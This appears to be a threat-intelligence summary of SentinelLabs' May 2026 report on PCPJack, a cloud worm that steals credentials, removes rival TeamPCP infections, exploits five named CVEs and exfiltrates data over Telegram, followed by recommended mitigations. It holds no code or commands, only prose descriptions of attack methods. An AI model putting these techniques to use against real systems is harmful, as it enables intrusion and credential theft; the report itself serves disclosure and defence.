PCPJack Worm Steals Cloud Credentials, Wipes TeamPCP Infections

Executive Summary

A new self-propagating malware framework dubbed PCPJack is actively stealing credentials from exposed cloud infrastructure — including Docker, Kubernetes, Redis, MongoDB, and RayML — while deliberately removing competing infections from the same systems. Researchers at SentinelLabs reported the campaign on May 7, 2026, noting that PCPJack appears designed for large-scale credential theft, likely monetized through financial fraud, spam operations, credential resale, or extortion. The worm explicitly targets and cleans artifacts left by the known threat group TeamPCP, leading SentinelLabs to assess with moderate confidence that PCPJack was developed by a former TeamPCP affiliate or member who started their own operation.

Technical Analysis

PCPJack infects Linux-based cloud systems via a shell script named bootstrap.sh. Upon execution, the script creates a hidden working directory, installs Python dependencies, downloads additional modules, establishes persistence, and launches the main orchestrator (monitor.py). During this initial stage, the malware explicitly checks for TeamPCP tooling and attempts to delete all TeamPCP processes, services, containers, files, and persistence artifacts, effectively claiming the compromised host for itself.

The malware's credential theft capabilities are broad, targeting cloud environments, developer systems, messenger applications, financial services, databases, SSH keys, Slack tokens, WordPress configuration files, OpenAI API keys, Anthropic API keys, Discord tokens, DigitalOcean tokens, and more. Stolen credentials are encrypted using X25519 ECDH and ChaCha20-Poly1305, then split into 2800-byte chunks and exfiltrated via Telegram channels, respecting the platform's message size limits.

Propagation occurs by scanning external cloud infrastructure for exposed services — Docker, Kubernetes, Redis, MongoDB, and RayML — and then attempting to exploit known vulnerabilities to gain initial access. SentinelLabs identified five specific CVEs exploited by PCPJack:

• CVE-2025-29927: Authentication bypass in Next.js middleware via crafted header
• CVE-2025-55182 ("React2Shell"): Server Actions deserialization flaw in React and Next.js
• CVE-2026-1357: Unauthenticated file upload in WPVivid Backup
• CVE-2025-9501: PHP injection in W3 Total Cache via cached mfunc comment
• CVE-2025-48703: Shell injection in CentOS Web Panel Filemanager changePerm functionality

Additionally, the malware downloads hostname data from Common Crawl parquet files and uses those as new targets for its scanning routine. Once inside a compromised environment, PCPJack performs lateral movement by harvesting SSH keys and credentials, enumerating Kubernetes clusters and Docker daemons, and executing itself on reachable internal hosts. Persistence is established using systemd services, cron jobs, Redis cron rewrites, or privileged containers before continuing propagation.

SentinelLabs also discovered a Sliver-based backdoor on the threat actor's infrastructure, with variants supporting x86_64, x86, and ARM architectures, indicating the operator maintains a secondary access method.

Tactics, Techniques & Procedures

PCPJack's operational flow follows a consistent pattern: initial access via exploitation of public-facing applications (T1190), credential harvesting from password stores and cloud metadata (T1555), lateral movement through remote service session hijacking (T1563), persistence via systemd and cron (T1543), and exfiltration over Telegram as a web service (T1567). The deliberate removal of TeamPCP artifacts is notable — it suggests the operator views rival infections as competition for the same monetizable access, rather than simply cleaning house for stealth.

Threat Actor Context

SentinelLabs draws a direct lineage between PCPJack and TeamPCP, a cloud-focused threat group known for high-profile supply-chain breaches against Aqua Security's Trivy scanner, the LiteLMM and Telnyx PyPI packages, and most recently SAP npm packages. The researchers noted that many of the services targeted by PCPJack mirror early TeamPCP/PCPCat campaigns from December 2025, before the group's high-visibility operations in early 2026 brought significant attention and purportedly led to changes in group membership. SentinelLabs stated: "We believe this could be a former operator who is deeply familiar with the group's tooling." This attribution carries moderate confidence — the evidence is circumstantial but consistent.

Mitigations & Recommendations

SentinelLabs recommends the following measures to reduce exposure to PCPJack and similar credential-harvesting worms:

• Enforce multi-factor authentication (MFA) on all cloud management interfaces and developer platforms.
• Use IMDSv2 in AWS to restrict metadata service access to hardened instances.
• Ensure proper authentication is configured for Docker daemons, Kubernetes API servers, Redis instances, and MongoDB deployments — do not expose these services to the internet without authentication.
• Follow least-privilege principles for service accounts and API keys.
• Avoid storing secrets in plaintext files or environment variables; use a secrets manager.
• Monitor for unexpected outbound Telegram API calls from cloud workloads, as these may indicate credential exfiltration.
• Apply patches for the five CVEs listed above, particularly CVE-2025-29927 (Next.js auth bypass) and CVE-2026-1357 (WPVivid Backup file upload), which are actively exploited in the wild.